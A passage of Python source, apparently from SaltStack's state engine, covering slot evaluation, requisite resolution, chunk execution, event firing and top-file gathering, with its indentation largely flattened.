# Given input __slot__:salt:test.arg(somekey="value").not.exist ~ /appended
# slot_text should be __slot...).not.exist
# append_data should be ~ /appended
slot_text = fmt[2].split("~")[0]
append_data = fmt[2].split("~", 1)[1:]
log.debug("slot_text: %s", slot_text)
log.debug("append_data: %s", append_data)
# Support parsing slot dict response
# return_get should result in a kwargs.nested.dict path by getting
# everything after first closing paren: )
return_get = None
try:
return_get = slot_text[slot_text.rindex(")") + 1 :]
except ValueError:
pass
if return_get:
# remove first period
return_get = return_get.split(".", 1)[1].strip()
log.debug("Searching slot result %s for %s", slot_return, return_get)
slot_return = salt.utils.data.traverse_dict_and_list(
slot_return, return_get, default=None, delimiter="."
)
if append_data:
if isinstance(slot_return, str):
# Append text to slot string result
append_data = " ".join(append_data).strip()
log.debug("appending to slot result: %s", append_data)
slot_return += append_data
else:
log.error("Ignoring slot append, slot result is not a string")
return slot_return
def format_slots(self, cdata):
"""
        Read in the arguments from the low-level slot syntax to make a
        last-minute runtime call to gather relevant data for the specific
        routine.
        Will parse strings, first-level dictionary values, and strings and
        first-level dict values inside of lists.
"""
        # __slot__:salt:cmd.run(foo, bar, baz=qux)
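        # Illustrative example (assumed): an argument value of
        #   "__slot__:salt:test.echo(hello)"
        # is replaced in cdata["args"]/cdata["kwargs"] with the return value
        # of the execution module call test.echo("hello") just before the
        # state function runs.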
SLOT_TEXT = "__slot__:"
ctx = (("args", enumerate(cdata["args"])), ("kwargs", cdata["kwargs"].items()))
for atype, avalues in ctx:
for ind, arg in avalues:
arg = salt.utils.data.decode(arg, keep=True)
if isinstance(arg, dict):
# Search dictionary values for __slot__:
for key, value in arg.items():
try:
if value.startswith(SLOT_TEXT):
log.trace("Slot processsing dict value %s", value)
cdata[atype][ind][key] = self.__eval_slot(value)
except AttributeError:
# Not a string/slot
continue
elif isinstance(arg, list):
for idx, listvalue in enumerate(arg):
log.trace("Slot processing list value: %s", listvalue)
if isinstance(listvalue, dict):
# Search dict values in list for __slot__:
for key, value in listvalue.items():
try:
if value.startswith(SLOT_TEXT):
log.trace(
"Slot processsing nested dict value %s",
value,
)
cdata[atype][ind][idx][key] = self.__eval_slot(
value
)
except AttributeError:
# Not a string/slot
continue
if isinstance(listvalue, str):
# Search strings in a list for __slot__:
if listvalue.startswith(SLOT_TEXT):
log.trace(
"Slot processsing nested string %s", listvalue
)
cdata[atype][ind][idx] = self.__eval_slot(listvalue)
elif isinstance(arg, str) and arg.startswith(SLOT_TEXT):
# Search strings for __slot__:
log.trace("Slot processsing %s", arg)
cdata[atype][ind] = self.__eval_slot(arg)
else:
# Not a slot, skip it
continue
def verify_retry_data(self, retry_data):
"""
        Verifies the specified retry data.
"""
retry_defaults = {
"until": True,
"attempts": 2,
"splay": 0,
"interval": 30,
}
expected_data = {
"until": bool,
"attempts": int,
"interval": int,
"splay": int,
}
validated_retry_data = {}
if isinstance(retry_data, dict):
for expected_key, value_type in expected_data.items():
if expected_key in retry_data:
if isinstance(retry_data[expected_key], value_type):
validated_retry_data[expected_key] = retry_data[expected_key]
else:
log.warning(
"An invalid value was passed for the retry %s, "
"using default value '%s'",
expected_key,
retry_defaults[expected_key],
)
validated_retry_data[expected_key] = retry_defaults[
expected_key
]
else:
validated_retry_data[expected_key] = retry_defaults[expected_key]
else:
log.warning(
"State is set to retry, but a valid dict for retry "
"configuration was not found. Using retry defaults"
)
validated_retry_data = retry_defaults
return validated_retry_data
def call_chunks(self, chunks):
"""
Iterate over a list of chunks and call them, checking for requires.
"""
# Check for any disabled states
disabled = {}
if "state_runs_disabled" in self.opts["grains"]:
for low in chunks[:]:
state_ = "{}.{}".format(low["state"], low["fun"])
for pat in self.opts["grains"]["state_runs_disabled"]:
if fnmatch.fnmatch(state_, pat):
comment = (
'The state function "{0}" is currently disabled by "{1}", '
"to re-enable, run state.enable {1}."
).format(state_, pat,)
_tag = _gen_tag(low)
disabled[_tag] = {
"changes": {},
"result": False,
"comment": comment,
"__run_num__": self.__run_num,
"__sls__": low["__sls__"],
}
self.__run_num += 1
chunks.remove(low)
break
running = {}
for low in chunks:
if "__FAILHARD__" in running:
running.pop("__FAILHARD__")
return running
tag = _gen_tag(low)
if tag not in running:
# Check if this low chunk is paused
action = self.check_pause(low)
if action == "kill":
break
running = self.call_chunk(low, running, chunks)
if self.check_failhard(low, running):
return running
self.active = set()
while True:
if self.reconcile_procs(running):
break
time.sleep(0.01)
ret = dict(list(disabled.items()) + list(running.items()))
return ret
def check_failhard(self, low, running):
"""
Check if the low data chunk should send a failhard signal
"""
tag = _gen_tag(low)
if self.opts.get("test", False):
return False
if low.get("failhard", self.opts["failhard"]) and tag in running:
if running[tag]["result"] is None:
return False
return not running[tag]["result"]
return False
def check_pause(self, low):
"""
Check to see if this low chunk has been paused
"""
if not self.jid:
# Can't pause on salt-ssh since we can't track continuous state
return
pause_path = os.path.join(self.opts["cachedir"], "state_pause", self.jid)
start = time.time()
if os.path.isfile(pause_path):
try:
                tries = 0
                while True:
with salt.utils.files.fopen(pause_path, "rb") as fp_:
try:
pdat = msgpack_deserialize(fp_.read())
except salt.utils.msgpack.exceptions.UnpackValueError:
# Reading race condition
if tries > 10:
# Break out if there are a ton of read errors
return
tries += 1
time.sleep(1)
continue
id_ = low["__id__"]
key = ""
if id_ in pdat:
key = id_
elif "__all__" in pdat:
key = "__all__"
if key:
if "duration" in pdat[key]:
now = time.time()
if now - start > pdat[key]["duration"]:
return "run"
if "kill" in pdat[key]:
return "kill"
else:
return "run"
time.sleep(1)
except Exception as exc: # pylint: disable=broad-except
log.error(
"Failed to read in pause data for file located at: %s", pause_path
)
return "run"
return "run"
def reconcile_procs(self, running):
"""
Check the running dict for processes and resolve them
"""
retset = set()
for tag in running:
proc = running[tag].get("proc")
if proc:
if not proc.is_alive():
ret_cache = os.path.join(
self.opts["cachedir"],
self.jid,
salt.utils.hashutils.sha1_digest(tag),
)
if not os.path.isfile(ret_cache):
ret = {
"result": False,
"comment": "Parallel process failed to return",
"name": running[tag]["name"],
"changes": {},
}
try:
with salt.utils.files.fopen(ret_cache, "rb") as fp_:
ret = msgpack_deserialize(fp_.read())
except OSError:
ret = {
"result": False,
"comment": "Parallel cache failure",
"name": running[tag]["name"],
"changes": {},
}
running[tag].update(ret)
running[tag].pop("proc")
else:
retset.add(False)
return False not in retset
def check_requisite(self, low, running, chunks, pre=False):
"""
Look into the running data to check the status of all requisite
states
"""
disabled_reqs = self.opts.get("disabled_requisites", [])
if not isinstance(disabled_reqs, list):
disabled_reqs = [disabled_reqs]
present = False
# If mod_watch is not available make it a require
if "watch" in low:
if "{}.mod_watch".format(low["state"]) not in self.states:
if "require" in low:
low["require"].extend(low.pop("watch"))
else:
low["require"] = low.pop("watch")
else:
present = True
if "watch_any" in low:
if "{}.mod_watch".format(low["state"]) not in self.states:
if "require_any" in low:
low["require_any"].extend(low.pop("watch_any"))
else:
low["require_any"] = low.pop("watch_any")
else:
present = True
if "require" in low:
present = True
if "require_any" in low:
present = True
if "prerequired" in low:
present = True
if "prereq" in low:
present = True
if "onfail" in low:
present = True
if "onfail_any" in low:
present = True
if "onfail_all" in low:
present = True
if "onchanges" in low:
present = True
if "onchanges_any" in low:
present = True
if not present:
return "met", ()
self.reconcile_procs(running)
reqs = {
"require": [],
"require_any": [],
"watch": [],
"watch_any": [],
"prereq": [],
"onfail": [],
"onfail_any": [],
"onfail_all": [],
"onchanges": [],
"onchanges_any": [],
}
if pre:
reqs["prerequired"] = []
for r_state in reqs:
if r_state in low and low[r_state] is not None:
if r_state in disabled_reqs:
log.warning(
"The %s requisite has been disabled, Ignoring.", r_state
)
continue
for req in low[r_state]:
if isinstance(req, str):
req = {"id": req}
req = trim_req(req)
found = False
for chunk in chunks:
req_key = next(iter(req))
req_val = req[req_key]
if req_val is None:
continue
if req_key == "sls":
# Allow requisite tracking of entire sls files
if fnmatch.fnmatch(chunk["__sls__"], req_val):
found = True
reqs[r_state].append(chunk)
continue
try:
if isinstance(req_val, str):
if fnmatch.fnmatch(
chunk["name"], req_val
) or fnmatch.fnmatch(chunk["__id__"], req_val):
if req_key == "id" or chunk["state"] == req_key:
found = True
reqs[r_state].append(chunk)
else:
raise KeyError
except KeyError as exc:
raise SaltRenderError(
"Could not locate requisite of [{}] present in state with name [{}]".format(
req_key, chunk["name"]
)
)
except TypeError:
# On Python 2, the above req_val, being an OrderedDict, will raise a KeyError,
# however on Python 3 it will raise a TypeError
# This was found when running tests.unit.test_state.StateCompilerTestCase.test_render_error_on_invalid_requisite
raise SaltRenderError(
"Could not locate requisite of [{}] present in state with name [{}]".format(
req_key, chunk["name"]
)
)
if not found:
return "unmet", ()
fun_stats = set()
for r_state, chunks in reqs.items():
req_stats = set()
if r_state.startswith("prereq") and not r_state.startswith("prerequired"):
run_dict = self.pre
else:
run_dict = running
while True:
if self.reconcile_procs(run_dict):
break
time.sleep(0.01)
for chunk in chunks:
tag = _gen_tag(chunk)
if tag not in run_dict:
req_stats.add("unmet")
continue
if r_state.startswith("onfail"):
if run_dict[tag]["result"] is True:
req_stats.add("onfail") # At least one state is OK
continue
else:
if run_dict[tag]["result"] is False:
req_stats.add("fail")
continue
if r_state.startswith("onchanges"):
if not run_dict[tag]["changes"]:
req_stats.add("onchanges")
else:
req_stats.add("onchangesmet")
continue
if r_state.startswith("watch") and run_dict[tag]["changes"]:
req_stats.add("change")
continue
if r_state.startswith("prereq") and run_dict[tag]["result"] is None:
if not r_state.startswith("prerequired"):
req_stats.add("premet")
if r_state.startswith("prereq") and not run_dict[tag]["result"] is None:
if not r_state.startswith("prerequired"):
req_stats.add("pre")
else:
if run_dict[tag].get("__state_ran__", True):
req_stats.add("met")
if r_state.endswith("_any") or r_state == "onfail":
if "met" in req_stats or "change" in req_stats:
if "fail" in req_stats:
req_stats.remove("fail")
if "onchangesmet" in req_stats:
if "onchanges" in req_stats:
req_stats.remove("onchanges")
if "fail" in req_stats:
req_stats.remove("fail")
if "onfail" in req_stats:
# a met requisite in this case implies a success
if "met" in req_stats:
req_stats.remove("onfail")
if r_state.endswith("_all"):
if "onfail" in req_stats:
# a met requisite in this case implies a failure
if "met" in req_stats:
req_stats.remove("met")
fun_stats.update(req_stats)
if "unmet" in fun_stats:
status = "unmet"
elif "fail" in fun_stats:
status = "fail"
elif "pre" in fun_stats:
if "premet" in fun_stats:
status = "met"
else:
status = "pre"
elif "onfail" in fun_stats and "onchangesmet" not in fun_stats:
status = "onfail"
elif "onchanges" in fun_stats and "onchangesmet" not in fun_stats:
status = "onchanges"
elif "change" in fun_stats:
status = "change"
else:
status = "met"
return status, reqs
def event(self, chunk_ret, length, fire_event=False):
"""
Fire an event on the master bus
If `fire_event` is set to True an event will be sent with the
chunk name in the tag and the chunk result in the event data.
If `fire_event` is set to a string such as `mystate/is/finished`,
an event will be sent with the string added to the tag and the chunk
result in the event data.
        If `state_events` is set to True in the config, then after the
        chunk is evaluated an event will be sent up to the master with the
        results.
"""
if not self.opts.get("local") and (
self.opts.get("state_events", True) or fire_event
):
if not self.opts.get("master_uri"):
ev_func = lambda ret, tag, preload=None: salt.utils.event.get_master_event(
self.opts, self.opts["sock_dir"], listen=False
).fire_event(
ret, tag
)
else:
ev_func = self.functions["event.fire_master"]
ret = {"ret": chunk_ret}
if fire_event is True:
tag = salt.utils.event.tagify(
[self.jid, self.opts["id"], str(chunk_ret["name"])], "state_result",
)
elif isinstance(fire_event, str):
tag = salt.utils.event.tagify(
[self.jid, self.opts["id"], str(fire_event)], "state_result",
)
else:
tag = salt.utils.event.tagify(
[self.jid, "prog", self.opts["id"], str(chunk_ret["__run_num__"])],
"job",
)
ret["len"] = length
preload = {"jid": self.jid}
ev_func(ret, tag, preload=preload)
def call_chunk(self, low, running, chunks):
"""
Check if a chunk has any requires, execute the requires and then
the chunk
"""
low = self._mod_aggregate(low, running, chunks)
self._mod_init(low)
tag = _gen_tag(low)
if not low.get("prerequired"):
self.active.add(tag)
requisites = [
"require",
"require_any",
"watch",
"watch_any",
"prereq",
"onfail",
"onfail_any",
"onchanges",
"onchanges_any",
]
if not low.get("__prereq__"):
requisites.append("prerequired")
status, reqs = self.check_requisite(low, running, chunks, pre=True)
else:
status, reqs = self.check_requisite(low, running, chunks)
if status == "unmet":
lost = {}
reqs = []
for requisite in requisites:
lost[requisite] = []
if requisite not in low:
continue
for req in low[requisite]:
if isinstance(req, str):
req = {"id": req}
req = trim_req(req)
found = False
req_key = next(iter(req))
req_val = req[req_key]
for chunk in chunks:
if req_val is None:
continue
if req_key == "sls":
# Allow requisite tracking of entire sls files
if fnmatch.fnmatch(chunk["__sls__"], req_val):
if requisite == "prereq":
chunk["__prereq__"] = True
reqs.append(chunk)
found = True
continue
if fnmatch.fnmatch(chunk["name"], req_val) or fnmatch.fnmatch(
chunk["__id__"], req_val
):
if req_key == "id" or chunk["state"] == req_key:
if requisite == "prereq":
chunk["__prereq__"] = True
elif requisite == "prerequired":
chunk["__prerequired__"] = True
reqs.append(chunk)
found = True
if not found:
lost[requisite].append(req)
if (
lost["require"]
or lost["watch"]
or lost["prereq"]
or lost["onfail"]
or lost["onchanges"]
or lost["require_any"]
or lost["watch_any"]
or lost["onfail_any"]
or lost["onchanges_any"]
or lost.get("prerequired")
):
comment = "The following requisites were not found:\n"
for requisite, lreqs in lost.items():
if not lreqs:
continue
comment += "{}{}:\n".format(" " * 19, requisite)
for lreq in lreqs:
req_key = next(iter(lreq))
req_val = lreq[req_key]
comment += "{}{}: {}\n".format(" " * 23, req_key, req_val)
if low.get("__prereq__"):
run_dict = self.pre
else:
run_dict = running
start_time, duration = _calculate_fake_duration()
run_dict[tag] = {
"changes": {},
"result": False,
"duration": duration,
"start_time": start_time,
"comment": comment,
"__run_num__": self.__run_num,
"__sls__": low["__sls__"],
}
self.__run_num += 1
self.event(run_dict[tag], len(chunks), fire_event=low.get("fire_event"))
return running
for chunk in reqs:
# Check to see if the chunk has been run, only run it if
# it has not been run already
ctag = _gen_tag(chunk)
if ctag not in running:
if ctag in self.active:
if chunk.get("__prerequired__"):
                            # Prereq recursive, run this chunk with prereq on
if tag not in self.pre:
low["__prereq__"] = True
self.pre[ctag] = self.call(low, chunks, running)
return running
else:
return running
elif ctag not in running:
log.error("Recursive requisite found")
running[tag] = {
"changes": {},
"result": False,
"comment": "Recursive requisite found",
"__run_num__": self.__run_num,
"__sls__": low["__sls__"],
}
self.__run_num += 1
self.event(
running[tag], len(chunks), fire_event=low.get("fire_event")
)
return running
running = self.call_chunk(chunk, running, chunks)
if self.check_failhard(chunk, running):
running["__FAILHARD__"] = True
return running
if low.get("__prereq__"):
status, reqs = self.check_requisite(low, running, chunks)
self.pre[tag] = self.call(low, chunks, running)
if not self.pre[tag]["changes"] and status == "change":
self.pre[tag]["changes"] = {"watch": "watch"}
self.pre[tag]["result"] = None
else:
running = self.call_chunk(low, running, chunks)
if self.check_failhard(chunk, running):
running["__FAILHARD__"] = True
return running
elif status == "met":
if low.get("__prereq__"):
self.pre[tag] = self.call(low, chunks, running)
else:
running[tag] = self.call(low, chunks, running)
elif status == "fail":
# if the requisite that failed was due to a prereq on this low state
# show the normal error
if tag in self.pre:
running[tag] = self.pre[tag]
running[tag]["__run_num__"] = self.__run_num
running[tag]["__sls__"] = low["__sls__"]
# otherwise the failure was due to a requisite down the chain
else:
                # determine what the requisite failures were, and return
# a nice error message
failed_requisites = set()
# look at all requisite types for a failure
for req_lows in reqs.values():
for req_low in req_lows:
req_tag = _gen_tag(req_low)
req_ret = self.pre.get(req_tag, running.get(req_tag))
# if there is no run output for the requisite it
# can't be the failure
if req_ret is None:
continue
# If the result was False (not None) it was a failure
if req_ret["result"] is False:
                            # use SLS.ID for the key so it's easier to find
key = "{sls}.{_id}".format(
sls=req_low["__sls__"], _id=req_low["__id__"]
)
failed_requisites.add(key)
_cmt = "One or more requisite failed: {}".format(
", ".join(str(i) for i in failed_requisites)
)
start_time, duration = _calculate_fake_duration()
running[tag] = {
"changes": {},
"result": False,
"duration": duration,
"start_time": start_time,
"comment": _cmt,
"__run_num__": self.__run_num,
"__sls__": low["__sls__"],
}
self.pre[tag] = running[tag]
self.__run_num += 1
elif status == "change" and not low.get("__prereq__"):
ret = self.call(low, chunks, running)
if not ret["changes"] and not ret.get("skip_watch", False):
low = low.copy()
low["sfun"] = low["fun"]
low["fun"] = "mod_watch"
low["__reqs__"] = reqs
ret = self.call(low, chunks, running)
running[tag] = ret
elif status == "pre":
start_time, duration = _calculate_fake_duration()
pre_ret = {
"changes": {},
"result": True,
"duration": duration,
"start_time": start_time,
"comment": "No changes detected",
"__run_num__": self.__run_num,
"__sls__": low["__sls__"],
}
running[tag] = pre_ret
self.pre[tag] = pre_ret
self.__run_num += 1
elif status == "onfail":
start_time, duration = _calculate_fake_duration()
running[tag] = {
"changes": {},
"result": True,
"duration": duration,
"start_time": start_time,
"comment": "State was not run because onfail req did not change",
"__state_ran__": False,
"__run_num__": self.__run_num,
"__sls__": low["__sls__"],
}
self.__run_num += 1
elif status == "onchanges":
start_time, duration = _calculate_fake_duration()
running[tag] = {
"changes": {},
"result": True,
"duration": duration,
"start_time": start_time,
"comment": "State was not run because none of the onchanges reqs changed",
"__state_ran__": False,
"__run_num__": self.__run_num,
"__sls__": low["__sls__"],
}
self.__run_num += 1
else:
if low.get("__prereq__"):
self.pre[tag] = self.call(low, chunks, running)
else:
running[tag] = self.call(low, chunks, running)
if tag in running:
self.event(running[tag], len(chunks), fire_event=low.get("fire_event"))
return running
def call_listen(self, chunks, running):
"""
Find all of the listen routines and call the associated mod_watch runs
"""
listeners = []
crefs = {}
for chunk in chunks:
crefs[(chunk["state"], chunk["__id__"], chunk["name"])] = chunk
if "listen" in chunk:
listeners.append(
{(chunk["state"], chunk["__id__"], chunk["name"]): chunk["listen"]}
)
if "listen_in" in chunk:
for l_in in chunk["listen_in"]:
for key, val in l_in.items():
listeners.append(
{(key, val, "lookup"): [{chunk["state"]: chunk["__id__"]}]}
)
mod_watchers = []
errors = {}
for l_dict in listeners:
for key, val in l_dict.items():
for listen_to in val:
if not isinstance(listen_to, dict):
found = False
for chunk in chunks:
if (
chunk["__id__"] == listen_to
or chunk["name"] == listen_to
):
listen_to = {chunk["state"]: chunk["__id__"]}
found = True
if not found:
continue
for lkey, lval in listen_to.items():
if not any(lkey == cref[0] and lval in cref for cref in crefs):
rerror = {
_l_tag(lkey, lval): {
"comment": "Referenced state {}: {} does not exist".format(
lkey, lval
),
"name": "listen_{}:{}".format(lkey, lval),
"result": False,
"changes": {},
}
}
errors.update(rerror)
continue
to_tags = [
_gen_tag(data)
for cref, data in crefs.items()
if lkey == cref[0] and lval in cref
]
for to_tag in to_tags:
if to_tag not in running:
continue
if running[to_tag]["changes"]:
if not any(
key[0] == cref[0] and key[1] in cref
for cref in crefs
):
rerror = {
_l_tag(key[0], key[1]): {
"comment": "Referenced state {}: {} does not exist".format(
key[0], key[1]
),
"name": "listen_{}:{}".format(
key[0], key[1]
),
"result": False,
"changes": {},
}
}
errors.update(rerror)
continue
new_chunks = [
data
for cref, data in crefs.items()
if key[0] == cref[0] and key[1] in cref
]
for chunk in new_chunks:
low = chunk.copy()
low["sfun"] = chunk["fun"]
low["fun"] = "mod_watch"
low["__id__"] = "listener_{}".format(low["__id__"])
for req in STATE_REQUISITE_KEYWORDS:
if req in low:
low.pop(req)
mod_watchers.append(low)
ret = self.call_chunks(mod_watchers)
running.update(ret)
for err in errors:
errors[err]["__run_num__"] = self.__run_num
self.__run_num += 1
running.update(errors)
return running
def call_high(self, high, orchestration_jid=None):
"""
Process a high data call and ensure the defined states.
"""
errors = []
# If there is extension data reconcile it
high, ext_errors = self.reconcile_extend(high)
errors.extend(ext_errors)
errors.extend(self.verify_high(high))
if errors:
return errors
high, req_in_errors = self.requisite_in(high)
errors.extend(req_in_errors)
high = self.apply_exclude(high)
# Verify that the high data is structurally sound
if errors:
return errors
# Compile and verify the raw chunks
chunks = self.compile_high_data(high, orchestration_jid)
# If there are extensions in the highstate, process them and update
# the low data chunks
if errors:
return errors
ret = self.call_chunks(chunks)
ret = self.call_listen(chunks, ret)
def _cleanup_accumulator_data():
accum_data_path = os.path.join(
get_accumulator_dir(self.opts["cachedir"]), self.instance_id
)
try:
os.remove(accum_data_path)
log.debug("Deleted accumulator data file %s", accum_data_path)
except OSError:
log.debug("File %s does not exist, no need to cleanup", accum_data_path)
_cleanup_accumulator_data()
if self.jid is not None:
pause_path = os.path.join(self.opts["cachedir"], "state_pause", self.jid)
if os.path.isfile(pause_path):
try:
os.remove(pause_path)
except OSError:
# File is not present, all is well
pass
return ret
def render_template(self, high, template):
errors = []
if not high:
return high, errors
if not isinstance(high, dict):
errors.append(
"Template {} does not render to a dictionary".format(template)
)
return high, errors
invalid_items = ("include", "exclude", "extends")
for item in invalid_items:
if item in high:
errors.append(
"The '{}' declaration found on '{}' is invalid when "
"rendering single templates".format(item, template)
)
return high, errors
for name in high:
if not isinstance(high[name], dict):
if isinstance(high[name], str):
                    # If this is a short state, it needs to be padded
if "." in high[name]:
comps = high[name].split(".")
high[name] = {
# '__sls__': template,
# '__env__': None,
comps[0]: [comps[1]]
}
continue
errors.append(
"ID {} in template {} is not a dictionary".format(
name, template
)
)
continue
skeys = set()
for key in sorted(high[name]):
if key.startswith("_"):
continue
if high[name][key] is None:
errors.append(
"ID '{}' in template {} contains a short "
"declaration ({}) with a trailing colon. When not "
"passing any arguments to a state, the colon must be "
"omitted.".format(name, template, key)
)
continue
if not isinstance(high[name][key], list):
continue
if "." in key:
comps = key.split(".")
# Salt doesn't support state files such as:
#
# /etc/redis/redis.conf:
# file.managed:
# - user: redis
# - group: redis
# - mode: 644
# file.comment:
# - regex: ^requirepass
if comps[0] in skeys:
errors.append(
"ID '{}' in template '{}' contains multiple "
"state declarations of the same type".format(name, template)
)
continue
high[name][comps[0]] = high[name].pop(key)
high[name][comps[0]].append(comps[1])
skeys.add(comps[0])
continue
skeys.add(key)
return high, errors
def call_template(self, template):
"""
Enforce the states in a template
"""
high = compile_template(
template,
self.rend,
self.opts["renderer"],
self.opts["renderer_blacklist"],
self.opts["renderer_whitelist"],
)
if not high:
return high
high, errors = self.render_template(high, template)
if errors:
return errors
return self.call_high(high)
def call_template_str(self, template):
"""
Enforce the states in a template, pass the template as a string
"""
high = compile_template_str(
template,
self.rend,
self.opts["renderer"],
self.opts["renderer_blacklist"],
self.opts["renderer_whitelist"],
)
if not high:
return high
high, errors = self.render_template(high, "<template-str>")
if errors:
return errors
return self.call_high(high)
class LazyAvailStates:
"""
The LazyAvailStates lazily loads the list of states of available
environments.
    This is particularly useful when top_file_merging_strategy=same and there
are many environments.
"""
def __init__(self, hs):
self._hs = hs
self._avail = {"base": None}
self._filled = False
def _fill(self):
if self._filled:
return
for saltenv in self._hs._get_envs():
if saltenv not in self._avail:
self._avail[saltenv] = None
self._filled = True
def __contains__(self, saltenv):
if saltenv == "base":
return True
self._fill()
return saltenv in self._avail
def __getitem__(self, saltenv):
if saltenv != "base":
self._fill()
if self._avail[saltenv] is None:
self._avail[saltenv] = self._hs.client.list_states(saltenv)
return self._avail[saltenv]
def items(self):
self._fill()
ret = []
        for saltenv in self._avail:
ret.append((saltenv, self.__getitem__(saltenv)))
return ret
class BaseHighState:
"""
The BaseHighState is an abstract base class that is the foundation of
running a highstate, extend it and add a self.state object of type State.
When extending this class, please note that ``self.client`` and
``self.matcher`` should be instantiated and handled.
"""
def __init__(self, opts):
self.opts = self.__gen_opts(opts)
self.iorder = 10000
self.avail = self.__gather_avail()
self.serial = salt.payload.Serial(self.opts)
self.building_highstate = OrderedDict()
def __gather_avail(self):
"""
Lazily gather the lists of available sls data from the master
"""
return LazyAvailStates(self)
def __gen_opts(self, opts):
"""
The options used by the High State object are derived from options
on the minion and the master, or just the minion if the high state
call is entirely local.
"""
# If the state is intended to be applied locally, then the local opts
# should have all of the needed data, otherwise overwrite the local
# data items with data from the master
if "local_state" in opts:
if opts["local_state"]:
return opts
mopts = self.client.master_opts()
if not isinstance(mopts, dict):
# An error happened on the master
opts["renderer"] = "jinja|yaml"
opts["failhard"] = False
opts["state_top"] = salt.utils.url.create("top.sls")
opts["nodegroups"] = {}
opts["file_roots"] = {"base": [syspaths.BASE_FILE_ROOTS_DIR]}
else:
opts["renderer"] = mopts["renderer"]
opts["failhard"] = mopts.get("failhard", False)
if mopts["state_top"].startswith("salt://"):
opts["state_top"] = mopts["state_top"]
elif mopts["state_top"].startswith("/"):
opts["state_top"] = salt.utils.url.create(mopts["state_top"][1:])
else:
opts["state_top"] = salt.utils.url.create(mopts["state_top"])
opts["state_top_saltenv"] = mopts.get("state_top_saltenv", None)
opts["nodegroups"] = mopts.get("nodegroups", {})
opts["state_auto_order"] = mopts.get(
"state_auto_order", opts["state_auto_order"]
)
opts["file_roots"] = mopts["file_roots"]
opts["top_file_merging_strategy"] = mopts.get(
"top_file_merging_strategy", opts.get("top_file_merging_strategy")
)
opts["env_order"] = mopts.get("env_order", opts.get("env_order", []))
opts["default_top"] = mopts.get("default_top", opts.get("default_top"))
opts["state_events"] = mopts.get("state_events")
opts["state_aggregate"] = mopts.get(
"state_aggregate", opts.get("state_aggregate", False)
)
opts["jinja_env"] = mopts.get("jinja_env", {})
opts["jinja_sls_env"] = mopts.get("jinja_sls_env", {})
opts["jinja_lstrip_blocks"] = mopts.get("jinja_lstrip_blocks", False)
opts["jinja_trim_blocks"] = mopts.get("jinja_trim_blocks", False)
return opts
def _get_envs(self):
"""
Pull the file server environments out of the master options
"""
envs = ["base"]
if "file_roots" in self.opts:
envs.extend([x for x in list(self.opts["file_roots"]) if x not in envs])
env_order = self.opts.get("env_order", [])
# Remove duplicates while preserving the order
members = set()
env_order = [
env for env in env_order if not (env in members or members.add(env))
]
client_envs = self.client.envs()
if env_order and client_envs:
return [env for env in env_order if env in client_envs]
elif env_order:
return env_order
else:
envs.extend([env for env in client_envs if env not in envs])
return envs
def get_tops(self):
"""
Gather the top files
"""
tops = DefaultOrderedDict(list)
include = DefaultOrderedDict(list)
done = DefaultOrderedDict(list)
found = 0 # did we find any contents in the top files?
# Gather initial top files
merging_strategy = self.opts["top_file_merging_strategy"]
if merging_strategy == "same" and not self.opts["saltenv"]:
if not self.opts["default_top"]:
raise SaltRenderError(
"top_file_merging_strategy set to 'same', but no "
"default_top configuration option was set"
)
if self.opts["saltenv"]:
contents = self.client.cache_file(
self.opts["state_top"], self.opts["saltenv"]
)
if contents:
found = 1
tops[self.opts["saltenv"]] = [
compile_template(
contents,
self.state.rend,
self.state.opts["renderer"],
self.state.opts["renderer_blacklist"],
self.state.opts["renderer_whitelist"],
saltenv=self.opts["saltenv"],
)
]
else:
tops[self.opts["saltenv"]] = [{}]
else:
found = 0
state_top_saltenv = self.opts.get("state_top_saltenv", False)
if state_top_saltenv and not isinstance(state_top_saltenv, str):
state_top_saltenv = str(state_top_saltenv)
for saltenv in (
[state_top_saltenv] if state_top_saltenv else self._get_envs()
):
contents = self.client.cache_file(self.opts["state_top"], saltenv)
if contents:
found = found + 1
tops[saltenv].append(
compile_template(
contents,
self.state.rend,
self.state.opts["renderer"],
self.state.opts["renderer_blacklist"],
self.state.opts["renderer_whitelist"],
saltenv=saltenv,
)
)
else:
tops[saltenv].append({})
log.debug("No contents loaded for saltenv '%s'", saltenv)
if (
found > 1
and merging_strategy == "merge"
and not self.opts.get("env_order", None)
):
log.warning(
"top_file_merging_strategy is set to '%s' and "
"multiple top files were found. Merging order is not "
"deterministic, it may be desirable to either set "
"top_file_merging_strategy to 'same' or use the "
"'env_order' configuration parameter to specify the "
"merging order.",
merging_strategy,
)
if found == 0:
log.debug(
"No contents found in top file. If this is not expected, "
"verify that the 'file_roots' specified in 'etc/master' "
"are accessible. The 'file_roots' configuration is: %s",
repr(self.state.opts["file_roots"]),
)
# Search initial top files for includes
for saltenv, ctops in tops.items():
for ctop in ctops:
if "include" not in ctop:
continue
for sls in ctop["include"]:
include[saltenv].append(sls)
ctop.pop("include")
# Go through the includes and pull out the extra tops and add them
while include:
pops = []
for saltenv, states in include.items():
pops.append(saltenv)
if not states:
continue
for sls_match in states:
for sls in fnmatch.filter(self.avail[saltenv], sls_match):
if sls in done[saltenv]:
continue
tops[saltenv].append(
compile_template(
self.client.get_state(sls, saltenv).get("dest", False),
self.state.rend,
self.state.opts["renderer"],
self.state.opts["renderer_blacklist"],
self.state.opts["renderer_whitelist"],
saltenv,
)
)
done[saltenv].append(sls)
for saltenv in pops:
if saltenv in include:
include.pop(saltenv)
return tops
def merge_tops(self, tops):
"""
Cleanly merge the top files
"""
merging_strategy = self.opts["top_file_merging_strategy"]
try:
merge_attr = "_merge_tops_{}".format(merging_strategy)
merge_func = getattr(self, merge_attr)
if not hasattr(merge_func, "__call__"):
msg = "'{}' is not callable".format(merge_attr)
log.error(msg)
raise TypeError(msg)
except (AttributeError, TypeError):
log.warning(
"Invalid top_file_merging_strategy '%s', falling back to " "'merge'",
merging_strategy,
)
merge_func = self._merge_tops_merge
return merge_func(tops)
def _merge_tops_merge(self, tops):
"""
The default merging strategy. The base env is authoritative, so it is
checked first, followed by the remaining environments. In top files
from environments other than "base", only the section matching the
environment from the top file will be considered, and it too will be
ignored if that environment was defined in the "base" top file.
"""
top = DefaultOrderedDict(OrderedDict)
# Check base env first as it is authoritative
base_tops = tops.pop("base", DefaultOrderedDict(OrderedDict))
for ctop in base_tops:
for saltenv, targets in ctop.items():
if saltenv == "include":
continue
try:
for tgt in targets:
top[saltenv][tgt] = ctop[saltenv][tgt]
except TypeError:
raise SaltRenderError(
"Unable to render top file. No targets found."
)
for cenv, ctops in tops.items():
for ctop in ctops:
for saltenv, targets in ctop.items():
if saltenv == "include":
continue
elif saltenv != cenv:
log.debug(
